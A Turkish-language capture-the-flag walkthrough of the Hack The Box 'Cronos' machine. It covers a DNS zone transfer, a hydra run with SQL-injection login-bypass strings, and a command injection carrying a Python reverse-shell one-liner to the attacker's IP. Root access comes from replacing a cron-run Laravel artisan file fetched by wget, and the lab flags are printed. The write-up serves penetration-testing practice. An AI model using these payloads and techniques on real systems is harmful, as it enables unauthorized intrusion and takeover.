İçeriğe geç

Cronos

Makine Adı Seviye OS Logo
Cronos - HTB Orta Linux

Walkthrough

nmap taraması ile başlayalım.


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

İlk oalrak 80'e gittim ve hiçbir şey bulamadım. Bunun üzerine 53. port'tan ilgi toplamayı denedim.

┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nslookup                                                                                                                                                                                          1 ⨯
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.
> 

Daha sonrasında bütün host'lqrı bulmayı denedim.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# host -l -a cronos.htb 10.10.10.13                     
Trying "cronos.htb"
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases: 

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26260
;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;cronos.htb.            IN  AXFR

;; ANSWER SECTION:
cronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.     604800  IN  NS  ns1.cronos.htb.
cronos.htb.     604800  IN  A   10.10.10.13
admin.cronos.htb.   604800  IN  A   10.10.10.13
ns1.cronos.htb.     604800  IN  A   10.10.10.13
www.cronos.htb.     604800  IN  A   10.10.10.13
cronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

Received 192 bytes from 10.10.10.13#53 in 83 ms

Bu hostları etc/hosts'uma ekledim ve devam ettim.

gobuster, dirb gibi taramalardan çok önemli bir şey çıkmadı ancak admin.cronos.htb sayfasında sqli olabileceğini düşündüm Bunun üzerine internetten sqli wordlisti buldum ve onu bir wordlist olarak hydra'ya verdim. Wordlist'in olduğu sayfa: https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-28 04:53:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806/p:806), ~40603 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[STATUS] 1588.00 tries/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active
[STATUS] 1611.33 tries/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: admin
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: toor
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: password
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: root
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: test
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: guest
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 'or string-length(name(.))<10 or'
[STATUS] 1729.00 tries/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: admin
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: password
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: root
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: test
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: toor
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: guest
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 'or string-length(name(.))<10 or'
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: admin
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: password
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: root
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: toor
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: test
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: guest
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 'or string-length(name(.))<10 or'
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

Harika şimdi sisteme giriş yapalım. Sisteme girşi yaptıktan sonra komut çalıştırabildiğimiz bir sayfa () gördüm.

8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

payloadını gönderdim ve reverse aldım.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nc -lvp 1234       
listening on [any] 1234 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

User flag'i direkt okuyabildim.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls
ls
noulis
www-data@cronos:/home$ cd noulis
cd noulis
www-data@cronos:/home/noulis$ ls
ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b

İçeride gezinirken artisan dosyasının root haklarda sürekli çalıştırıdlığını gördüm ve yazma hakkımda vardı. Bunun üzerine bir reverse ayarladım ve makineye upload ettim daha sonrasında bir dinleme kabuğu başlattım ve root oldum.

* * * * *     root   php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

www-data@cronos:/var/www/laravel$ wget http://10.10.14.4/artisan
wget http://10.10.14.4/artisan
--2021-08-29 12:52:12--  http://10.10.14.4/artisan
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'artisan.1'

artisan.1           100%[===================>]   5.36K  --.-KB/s    in 0s      

2021-08-29 12:52:12 (471 MB/s) - 'artisan.1' saved [5492/5492]

www-data@cronos:/var/www/laravel$ rm artisan
rm artisan
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan
mv artisan.1 artisan
┌──(root💀kali)-[/opt/PEASS-ng/linPEAS]
└─# nc -vlp 4444                                                                                       130 ⨯
listening on [any] 4444 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 12:53:01 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir